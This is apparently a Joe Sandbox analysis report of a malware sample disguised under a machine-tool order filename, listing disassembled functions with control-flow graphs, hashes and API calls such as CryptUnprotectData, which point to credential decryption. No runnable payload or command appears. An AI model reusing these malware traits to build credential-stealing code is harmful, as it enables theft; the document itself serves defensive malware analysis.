                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: a79109f40b59f8b366e4f55786f111a01af4acc1c32c2e19414b32e963f2b4c4
                                                                                                                                                                                                                          • Instruction ID: 01230a47186b280d7b7a42a0d1c7b379f5474aa60cad4a9ba1f16ff9cc0826e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a79109f40b59f8b366e4f55786f111a01af4acc1c32c2e19414b32e963f2b4c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B481B274E002189FDB18DFA9D894BDDBBF2BF89310F248069E409AB365DB349981CF50
                                                                                                                                                                                                                          Function 0011CDF4 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1545 11cdf4-11ce20 1546 11ce22 1545->1546 1547 11ce27-11cf04 call 114120 call 113c40 1545->1547 1546->1547 1557 11cf06 1547->1557 1558 11cf0b-11cf2c call 1155d8 1547->1558 1557->1558 1560 11cf31-11cf3c 1558->1560 1561 11cf43-11cf47 1560->1561 1562 11cf3e 1560->1562 1563 11cf49-11cf4a 1561->1563 1564 11cf4c-11cf53 1561->1564 1562->1561 1565 11cf6b-11cfaf 1563->1565 1566 11cf55 1564->1566 1567 11cf5a-11cf68 1564->1567 1571 11d015-11d02c 1565->1571 1566->1567 1567->1565 1573 11cfb1-11cfc7 1571->1573 1574 11d02e-11d053 1571->1574 1578 11cff1 1573->1578 1579 11cfc9-11cfd5 1573->1579 1581 11d055-11d06a 1574->1581 1582 11d06b 1574->1582 1580 11cff7-11d014 1578->1580 1583 11cfd7-11cfdd 1579->1583 1584 11cfdf-11cfe5 1579->1584 1580->1571 1581->1582 1585 11cfef 1583->1585 1584->1585 1585->1580
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 1eb713edec86ad62827f3bd451d3cf47e782f760bead66210197de3aa259791c
                                                                                                                                                                                                                          • Instruction ID: 82edaed0f7d470dcaff23e7ebf20143753f6add083ec74fe691565573b048f68
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb713edec86ad62827f3bd451d3cf47e782f760bead66210197de3aa259791c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D881A574E00619CFDB18DFA9D954ADDBBF2BF88310F148069E809AB365DB349986CF50
                                                                                                                                                                                                                          Function 0011C584 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1589 11c584-11c5b0 1590 11c5b2 1589->1590 1591 11c5b7-11c694 call 114120 call 113c40 1589->1591 1590->1591 1601 11c696 1591->1601 1602 11c69b-11c6bc call 1155d8 1591->1602 1601->1602 1604 11c6c1-11c6cc 1602->1604 1605 11c6d3-11c6d7 1604->1605 1606 11c6ce 1604->1606 1607 11c6d9-11c6da 1605->1607 1608 11c6dc-11c6e3 1605->1608 1606->1605 1609 11c6fb-11c73f 1607->1609 1610 11c6e5 1608->1610 1611 11c6ea-11c6f8 1608->1611 1615 11c7a5-11c7bc 1609->1615 1610->1611 1611->1609 1617 11c741-11c757 1615->1617 1618 11c7be-11c7e3 1615->1618 1622 11c781 1617->1622 1623 11c759-11c765 1617->1623 1625 11c7e5-11c7fa 1618->1625 1626 11c7fb 1618->1626 1624 11c787-11c7a4 1622->1624 1627 11c767-11c76d 1623->1627 1628 11c76f-11c775 1623->1628 1624->1615 1625->1626 1629 11c77f 1627->1629 1628->1629 1629->1624
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 3de4a2144c67b31857c913d9c5cd4953477368be96619227d0f928ce529305e9
                                                                                                                                                                                                                          • Instruction ID: 711fb0f55eccb60885b53df22850dfa098cf1b7bd64b73950ca684f52c5a1bdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3de4a2144c67b31857c913d9c5cd4953477368be96619227d0f928ce529305e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9981C574E00218CFDB18DFA9D994ADDBBF2BF88310F248069E459AB365DB749981CF50
                                                                                                                                                                                                                          Function 0011C851 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1633 11c851-11c880 1634 11c882 1633->1634 1635 11c887-11c964 call 114120 call 113c40 1633->1635 1634->1635 1645 11c966 1635->1645 1646 11c96b-11c98c call 1155d8 1635->1646 1645->1646 1648 11c991-11c99c 1646->1648 1649 11c9a3-11c9a7 1648->1649 1650 11c99e 1648->1650 1651 11c9a9-11c9aa 1649->1651 1652 11c9ac-11c9b3 1649->1652 1650->1649 1653 11c9cb-11ca0f 1651->1653 1654 11c9b5 1652->1654 1655 11c9ba-11c9c8 1652->1655 1659 11ca75-11ca8c 1653->1659 1654->1655 1655->1653 1661 11ca11-11ca27 1659->1661 1662 11ca8e-11cab3 1659->1662 1666 11ca51 1661->1666 1667 11ca29-11ca35 1661->1667 1671 11cab5-11caca 1662->1671 1672 11cacb 1662->1672 1670 11ca57-11ca74 1666->1670 1668 11ca37-11ca3d 1667->1668 1669 11ca3f-11ca45 1667->1669 1673 11ca4f 1668->1673 1669->1673 1670->1659 1671->1672 1673->1670
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 17f87794ebe7cea1243456a925b30e26c5d7c0d087f56af59be2be48dc58aa3c
                                                                                                                                                                                                                          • Instruction ID: ed0b4cd6ff44be26f24f54af3bb5a1a0f30826a71ac99418201a497207ff12d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17f87794ebe7cea1243456a925b30e26c5d7c0d087f56af59be2be48dc58aa3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6581A374E40218CFDB18DFA9D994ADDBBF2BF88300F248069E409AB365DB749981CF50
                                                                                                                                                                                                                          Function 001152FD Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1677 1152fd-115320 1678 115322 1677->1678 1679 115327-115404 call 114120 call 113c40 1677->1679 1678->1679 1689 115406 1679->1689 1690 11540b-115429 1679->1690 1689->1690 1720 11542c call 1155d0 1690->1720 1721 11542c call 1155d8 1690->1721 1691 115432-11543d 1692 115444-115448 1691->1692 1693 11543f 1691->1693 1694 11544a-11544b 1692->1694 1695 11544d-115454 1692->1695 1693->1692 1696 11546c-1154b0 1694->1696 1697 115456 1695->1697 1698 11545b-115469 1695->1698 1702 115516-11552d 1696->1702 1697->1698 1698->1696 1704 1154b2-1154c8 1702->1704 1705 11552f-115554 1702->1705 1709 1154f2 1704->1709 1710 1154ca-1154d6 1704->1710 1711 115556-11556b 1705->1711 1712 11556c 1705->1712 1715 1154f8-115515 1709->1715 1713 1154e0-1154e6 1710->1713 1714 1154d8-1154de 1710->1714 1711->1712 1716 1154f0 1713->1716 1714->1716 1715->1702 1716->1715 1720->1691 1721->1691
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$Lj;p$Lj;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-868513217
                                                                                                                                                                                                                          • Opcode ID: 8641b3c1db93d9c77d63ceaf948fa177d629b35af7dfd37b98c5af7344bfd3b6
                                                                                                                                                                                                                          • Instruction ID: b0921b90fee308b215fc9da145b6000134748b808d64e31492411ee94347c4e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8641b3c1db93d9c77d63ceaf948fa177d629b35af7dfd37b98c5af7344bfd3b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F81B474E00618CFDB58DFA9D954ADDBBF2BF88310F148069E819AB365EB349981CF50
                                                                                                                                                                                                                          Function 00116F48 Relevance: 5.5, Strings: 4, Instructions: 454COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1722 116f48-116f7e 1723 116f86-116f8c 1722->1723 1856 116f80 call 116920 1722->1856 1857 116f80 call 116f48 1722->1857 1858 116f80 call 117098 1722->1858 1724 116fdc-116fe0 1723->1724 1725 116f8e-116f92 1723->1725 1728 116fe2-116ff1 1724->1728 1729 116ff7-11700b 1724->1729 1726 116fa1-116fa8 1725->1726 1727 116f94-116f99 1725->1727 1730 11707e-117088 1726->1730 1731 116fae-116fb5 1726->1731 1727->1726 1733 116ff3-116ff5 1728->1733 1734 11701d-117027 1728->1734 1732 117013-11701a 1729->1732 1860 11700d call 11a128 1729->1860 1744 117067-117077 1730->1744 1745 11708a-1170bb 1730->1745 1731->1724 1735 116fb7-116fbb 1731->1735 1733->1732 1736 117031-117035 1734->1736 1737 117029-11702f 1734->1737 1738 116fca-116fd1 1735->1738 1739 116fbd-116fc2 1735->1739 1740 11703d-117066 1736->1740 1741 117037 1736->1741 1737->1740 1738->1730 1743 116fd7-116fda 1738->1743 1739->1738 1740->1744 1741->1740 1743->1732 1744->1730 1746 1170c6-1170e6 1745->1746 1747 1170bd-1170c3 1745->1747 1755 1170e8 1746->1755 1756 1170ed-1170f4 1746->1756 1747->1746 1758 11747c-117485 1755->1758 1757 1170f6-117101 1756->1757 1759 117107-11711a 1757->1759 1760 11748d-11749d 1757->1760 1763 117130-11714b 1759->1763 1764 11711c-11712a 1759->1764 1765 1174b0-1174ba 1760->1765 1766 11749f-1174a5 1760->1766 1773 11714d-117153 1763->1773 1774 11716f-117172 1763->1774 1764->1763 1771 117404-11740b 1764->1771 1767 1174a7-1174af 1766->1767 1768 1174b8-1174c9 1766->1768 1767->1765 1777 1174d2-1174d6 1768->1777 1778 1174cb-1174d0 1768->1778 1771->1758 1781 11740d-11740f 1771->1781 1779 117155 1773->1779 1780 11715c-11715f 1773->1780 1775 117178-11717b 1774->1775 1776 1172cc-1172d2 1774->1776 1775->1776 1784 117181-117187 1775->1784 1782 1172d8-1172dd 1776->1782 1783 1173be-1173c1 1776->1783 1785 1174dc-1174dd 1777->1785 1778->1785 1779->1776 1779->1780 1779->1783 1786 117192-117198 1779->1786 1780->1786 1787 117161-117164 1780->1787 1788 117411-117416 1781->1788 1789 11741e-117424 1781->1789 1782->1783 1792 1173c7-1173cd 1783->1792 1793 117488 1783->1793 1784->1776 1791 11718d 1784->1791 1794 11719a-11719c 1786->1794 1795 11719e-1171a0 1786->1795 1796 11716a 1787->1796 1797 1171fe-117204 1787->1797 1788->1789 1789->1760 1790 117426-11742b 1789->1790 1798 117470-117473 1790->1798 1799 11742d-117432 1790->1799 1791->1783 1801 1173f2-1173f6 1792->1801 1802 1173cf-1173d7 1792->1802 1793->1760 1803 1171aa-1171b3 1794->1803 1795->1803 1796->1783 1797->1783 1800 11720a-117210 1797->1800 1798->1793 1811 117475-11747a 1798->1811 1799->1793 1804 117434 1799->1804 1805 117212-117214 1800->1805 1806 117216-117218 1800->1806 1801->1771 1810 1173f8-1173fe 1801->1810 1802->1760 1807 1173dd-1173ec 1802->1807 1808 1171b5-1171c0 1803->1808 1809 1171c6-1171ee 1803->1809 1812 11743b-117440 1804->1812 1813 117222-117239 1805->1813 1806->1813 1807->1763 1807->1801 1808->1783 1808->1809 1831 1172e2-117318 1809->1831 1832 1171f4-1171f9 1809->1832 1810->1757 1810->1771 1811->1758 1811->1781 1814 117462-117464 1812->1814 1815 117442-117444 1812->1815 1824 117264-11728b 1813->1824 1825 11723b-117254 1813->1825 1814->1793 1822 117466-117469 1814->1822 1819 117453-117459 1815->1819 1820 117446-11744b 1815->1820 1819->1760 1823 11745b-117460 1819->1823 1820->1819 1822->1798 1823->1814 1827 117436-117439 1823->1827 1824->1793 1837 117291-117294 1824->1837 1825->1831 1835 11725a-11725f 1825->1835 1827->1793 1827->1812 1838 117325-11732d 1831->1838 1839 11731a-11731e 1831->1839 1832->1831 1835->1831 1837->1793 1840 11729a-1172c3 1837->1840 1838->1793 1843 117333-117338 1838->1843 1841 117320-117323 1839->1841 1842 11733d-117341 1839->1842 1840->1831 1855 1172c5-1172ca 1840->1855 1841->1838 1841->1842 1844 117360-117364 1842->1844 1845 117343-117349 1842->1845 1843->1783 1848 117366-11736c 1844->1848 1849 11736e-11738d call 117670 1844->1849 1845->1844 1847 11734b-117353 1845->1847 1847->1793 1850 117359-11735e 1847->1850 1848->1849 1852 117393-117397 1848->1852 1849->1852 1850->1783 1852->1783 1853 117399-1173b5 1852->1853 1853->1783 1855->1831 1856->1723 1857->1723 1858->1723 1860->1732
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$(oZr$,^r$,^r
                                                                                                                                                                                                                          • API String ID: 0-3758845024
                                                                                                                                                                                                                          • Opcode ID: ecf2616548d4b1a180594e60be4707778c945ef094480d3b63e977543abfcb9e
                                                                                                                                                                                                                          • Instruction ID: 4d84e03dc70b48f6b6f069a1a86a124cc3729dd9dde3535ebc3334e5430c8198
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecf2616548d4b1a180594e60be4707778c945ef094480d3b63e977543abfcb9e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98024E31A08219DFDB18CFA8D854AEDBBF2BF49304F158069E855AB3A1D734DD81DB50
                                                                                                                                                                                                                          Function 00112974 Relevance: 5.3, Strings: 4, Instructions: 348COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1861 112974-11297e 1863 112980-1129c3 1861->1863 1864 112909-112918 1861->1864 1867 1129e5-112a34 1863->1867 1868 1129c5-1129e4 1863->1868 1865 11291f-112950 1864->1865 1874 112a36-112a3d 1867->1874 1875 112a4f-112a57 1867->1875 1876 112a46-112a4d 1874->1876 1877 112a3f-112a44 1874->1877 1879 112a5a-112a6e 1875->1879 1876->1879 1877->1879 1881 112a70-112a77 1879->1881 1882 112a84-112a8c 1879->1882 1883 112a79-112a7b 1881->1883 1884 112a7d-112a82 1881->1884 1885 112a8e-112a92 1882->1885 1883->1885 1884->1885 1887 112af2-112af5 1885->1887 1888 112a94-112aa9 1885->1888 1889 112af7-112b0c 1887->1889 1890 112b3d-112b43 1887->1890 1888->1887 1896 112aab-112aae 1888->1896 1889->1890 1900 112b0e-112b12 1889->1900 1891 112b49-112b4b 1890->1891 1892 11363e 1890->1892 1891->1892 1894 112b51-112b56 1891->1894 1897 113643-113674 1892->1897 1898 1135ec-1135f0 1894->1898 1899 112b5c 1894->1899 1901 112ab0-112ab2 1896->1901 1902 112acd-112aeb call 1102c8 1896->1902 1919 1136a1-1137e2 1897->1919 1920 113676-11369f 1897->1920 1905 1135f2-1135f5 1898->1905 1906 1135f7-11363d 1898->1906 1899->1898 1907 112b14-112b18 1900->1907 1908 112b1a-112b38 call 1102c8 1900->1908 1901->1902 1903 112ab4-112ab7 1901->1903 1902->1887 1903->1887 1910 112ab9-112acb 1903->1910 1905->1897 1905->1906 1907->1890 1907->1908 1908->1890 1910->1887 1910->1902 1920->1919
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: X^r$X^r$X^r$X^r
                                                                                                                                                                                                                          • API String ID: 0-1944539317
                                                                                                                                                                                                                          • Opcode ID: d1ad70fde465c19675bf12efc04d25818a41296b29248b7ef4120245fd0ff0e7
                                                                                                                                                                                                                          • Instruction ID: ee17d80c9251d1dcb9df02e7d161951694dffc0a8937c9028c5671957dd968a3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1ad70fde465c19675bf12efc04d25818a41296b29248b7ef4120245fd0ff0e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BC19E32D103198FCBD98F788D012EA7BB5AF52300F5A45F6D805DB252F7718D869B61
                                                                                                                                                                                                                          Function 0011BD10 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0o;p$PHZr$PHZr
                                                                                                                                                                                                                          • API String ID: 0-3091082374
                                                                                                                                                                                                                          • Opcode ID: b4815c834ad0c2866661ad6a60244037619f3033b23304a25eb1455f18a6f1dd
                                                                                                                                                                                                                          • Instruction ID: 238e710dce006ebf29885198de9493b29cb47795d95f33bb4c392383fdcb6c1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4815c834ad0c2866661ad6a60244037619f3033b23304a25eb1455f18a6f1dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8761D874E012088FDB18DFAAD9946DDBBF2BF88310F14C069E408AB365DB345982CF50
                                                                                                                                                                                                                          Function 00116920 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (oZr$H^r
                                                                                                                                                                                                                          • API String ID: 0-518277955
                                                                                                                                                                                                                          • Opcode ID: 80bd3494728d0fdd82ae2c0ca0442d5b8dc4f0f77783e57eac369e0924ddff5f
                                                                                                                                                                                                                          • Instruction ID: 1ce40027478f158a9ae6118deaf98621f027528c8249ee17a64411446504126c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80bd3494728d0fdd82ae2c0ca0442d5b8dc4f0f77783e57eac369e0924ddff5f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF124C70A002159FDB18DFA8C854BAEBBF6FF89310F248169E445DB395EB359D41CB90
                                                                                                                                                                                                                          Function 385DD078 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 385DD0E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 82012b749b93884c013e75f2c89213d249cab9a79a2906a96e97b0b3ff19f8af
                                                                                                                                                                                                                          • Instruction ID: 747d26b661b26930fd985224de3315e32d0820ba44b110b458fabc8f27734437
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82012b749b93884c013e75f2c89213d249cab9a79a2906a96e97b0b3ff19f8af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F61179B6800249DFDB11CF99C945BEEBFF0EF48320F24881AE958A7210C338A555DFA1
                                                                                                                                                                                                                          Function 385DC9A8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 385DD0E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                                                          • Opcode ID: 27ea8991d1ca80ce26755f01810b1cacc00cf370c1f6ac8512526414eae48971
                                                                                                                                                                                                                          • Instruction ID: e4111cfef13062485225c952eb8227eb03a1a4b02522b2b0d642580298516a16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27ea8991d1ca80ce26755f01810b1cacc00cf370c1f6ac8512526414eae48971
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E71164B6800349DFDB10CF99C845BEEBBF4EF88320F24841AE954A7200D739A955DFA5
                                                                                                                                                                                                                          Function 385D2448 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (85
                                                                                                                                                                                                                          • API String ID: 0-2359961898
                                                                                                                                                                                                                          • Opcode ID: d0953f3bb5c29ef5af120afdd8a1a84ce1e551087fc45a77ea5da1357891e8a4
                                                                                                                                                                                                                          • Instruction ID: 870b5cfcacfa463112cf40eaabb182fa602a6a7e04dde3fc418ce97c8488c8d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0953f3bb5c29ef5af120afdd8a1a84ce1e551087fc45a77ea5da1357891e8a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99A10574D002088FEB14DFB8D944BDDBBB1FF89314F208269E409AB291DB749989CF51
                                                                                                                                                                                                                          Function 385D2458 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (85
                                                                                                                                                                                                                          • API String ID: 0-2359961898
                                                                                                                                                                                                                          • Opcode ID: 424424344a8ba5ebc138f2c277df2579a03b106eb890f6531bad0465f296b65c
                                                                                                                                                                                                                          • Instruction ID: 7261eaff9d0c585afc657f780cf577683449dfa7fd4e13e8e45bc0438e67f693
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 424424344a8ba5ebc138f2c277df2579a03b106eb890f6531bad0465f296b65c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15A1F474D002088FEB14DFA8D944BDDBBB1BF88315F208269E409AB2A5DB749989CF55
                                                                                                                                                                                                                          Function 385D0040 Relevance: .7, Instructions: 709COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972344550.00000000385D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385D0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385d0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0b914d51f953e52157eb2d1819b965390ed60ad5c2a017a95a27da3be8d78d15
                                                                                                                                                                                                                          • Instruction ID: 02f6fdf0a8866372894e5cb5d549ef9ab40aeb96abfc262bc828c0f1d728fe70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b914d51f953e52157eb2d1819b965390ed60ad5c2a017a95a27da3be8d78d15
